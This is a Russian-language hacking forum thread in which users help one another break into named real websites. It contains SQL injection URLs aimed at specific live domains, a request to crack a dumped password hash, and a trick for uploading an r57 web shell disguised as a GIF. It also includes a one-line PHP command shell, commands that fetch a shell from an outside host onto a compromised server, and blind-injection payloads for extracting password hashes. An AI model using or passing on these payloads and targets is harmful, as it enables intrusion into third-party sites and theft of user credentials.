Ваши вопросы по уязвимостям.

Наверное не по теме,но не знаю куда обратится.
Помогите плиз розшифровать хэш..
Rag 50:87e19ab4b5f9c1df9c8fd703361ca4c2
user:f2bf096b5155b3848c02621e29e626e2

 

http://www.carsec.ee/index.php?show=tooted&lang=est&id=7

Не клеится чет,но union+Select пускает).Остальное ничего не работает.

 

а где там скуль? 0)

 

Для этих целей есть спец тема - http://forum.antichat.ru/threadedpost1109473.html

 

а что за хрень? количество столбцов подобрал,но вывода нет, а в низу страницы The used SELECT statements have a different number of columns
не пойму...подобрал же.

Code:

http://www.org-tech.ru/view.php?id=-5099&cat=1%20union%20select%201,2,3,4%20--

 

http://www.org-tech.ru/view.php?id=50990+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45&cat=1

 

ну вот ребят, есть метод чтобы залить шелл через битбукет без инклуда... ну вот и способ:

простой r57 переименовать в такое название:

myshell.php._gif этого файла будет читать как пхп файл

в многих случиаях надо открыть шелл и прописать в начяле GIF89a для того чтобы bitbucket определил его как фотку .gif

 

есть пару вапросов:

1) вот я залил один файл в каторым ноходица

Code:

<? system($_GET[c]) ?>

я пробавал залить шелл через этот варянт таким путём:

Code:

curl --output /papka/na/servere/shell.php http://site.com/shell.php
wget -o /papka/na/servere/shell.php http://site.com/shell.php
get http://site.com/shell.php > /papka/na/servere/shell.php
links -source "http://site.com/shell.php" > /papka/na/servere/shell.php
lynx -source http://site.com/shell.php > /papka/na/servere/shell.php
fetch -o /papka/na/servere/shell.php http://site.com/shell.php

но не залился... может есть какие нибудь команды чтобы ишё как нибудь залить шелл? или проста скачять все файлы каторые есть в DOCUMENT_ROOT ???

2) я нашол одну дыру в одном сайте, пасматрел в моём кампе у меня есть такой же файл... ну вот и сам файл:

Code:

$requestid = $_GET["requestid"];
$res = mysql_query("SELECT userid, filledby FROM requests WHERE id =$requestid") or sqlerr();
 $arr = mysql_fetch_assoc($res);
if (($CURUSER[id] == $arr[userid]) || (get_user_class() >= 4) || ($CURUSER[id] == $arr[filledby]))
{
 @mysql_query("UPDATE requests SET filled='', filledby=0 WHERE id =$requestid") or sqlerr();
 print("Request $requestid successfully reset.");
}
else
 print("Sorry, cannot reset a request when you are not the owner");

делаю запрос на том сайте:

Code:

reqreset.php?requestid=-1'+union+select+passhash+from+users+--+

передомной ошибка в sql:

Code:

SQL Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' passhash from users --' at line 1

помойму тамо сидит фильтр на кавачикй...

 

так как не нашел инфу по поводу моего вопроса , решил обратится к вам

http://www.cmediere.ro/index.php?mid=3&smid=-16'
Interbase...

помогите составить запрос, либо направте по ссылке на нужную информацию.
Сильно не пинать, так как не часто прошу помощи. спасибо

 

downloader,
1. это nix? which wget GET curl lynx ? попробуй через аплоад:

2. ковычка там не нужна и колонки в запросе две

Gorev, обе переменные участвуют в нескольких запросах поэтому связка с union там врятли прокатит, вообще говоря, т.к. колонка в одном из запросов одна выглядело бы примерно так -1+union+select+cast(user+as+char(n))+from+rdb$user_privileges/* причем тип данных (as char/int/etc(n)) должен совпадать с изначальным в первой выборке, если посимвольным брутом надо покапаться в мануалах найти функцию которая работает с выражениями/строками, особо не вдавался в этот вопрос
/add посмотрел пока писал сообщение посимвольно будет выглядеть примерно так:
+and+substring((select+rdb$user+from+rdb$user_privileges+здесь_какой_нибудь_поддерживаемый_лимит(например rows))+from+1+for+0)='a'/*
все с точностью прочитанного нескольками минутами назад мануала, надо бы поставить, посмотреть может наврал где-то

 

Gorev, ну и ещё - тебе надо умудриться не только подобрать количество колонок в union, но и их типы) ибо из мануала

 

http://www.np-ats.ru/index.jsp?pid=612'+order+by+1--

Такая же хня,скуля там есть.

 

freeBSD 6.2

sorry но не понял как делать через аплоад я ещё навичок в этом деле

 

Не могу найти скулю, помогите плз...

 

Включена фильтрация кавычек, вряд скули там будут.

 

что можешь посоветовать?

 

искать уязвимости. что ещё советовать-то?) Инъекции в ом параметре нет

 

где тут вывод???
http://eromarket.com.ua/index.php?productID=-99999%20union%20select%20version()/*

 

Забавная у тебя там инъекция, без минуса если:

Code:

http://eromarket.com.ua/index.php?productID=99999

Code:

http://eromarket.com.ua/index.php?categoryID=15+and+substring(version(),1,1)=5

5 ветка, похоже слепая, принтабельных колонок или в исходниках ничего не увидел

ан нет, именно в исходниках вывод и есть

5.0.45-log

Code:

http://eromarket.com.ua/index.php?categoryID=15+union+select+version()/*

80 таблиц. Успехов. File_priv нету

 

http://www.administrator.net.ru/?id=4-1 = http://www.administrator.net.ru/?id=3

соответственно должна быть скуля?
при 7 колонках пустая пага....есть ли тут скуля? и как ее крутить?
http://www.administrator.net.ru/?id=-4+union+select+1,2,3,4,5,6,7--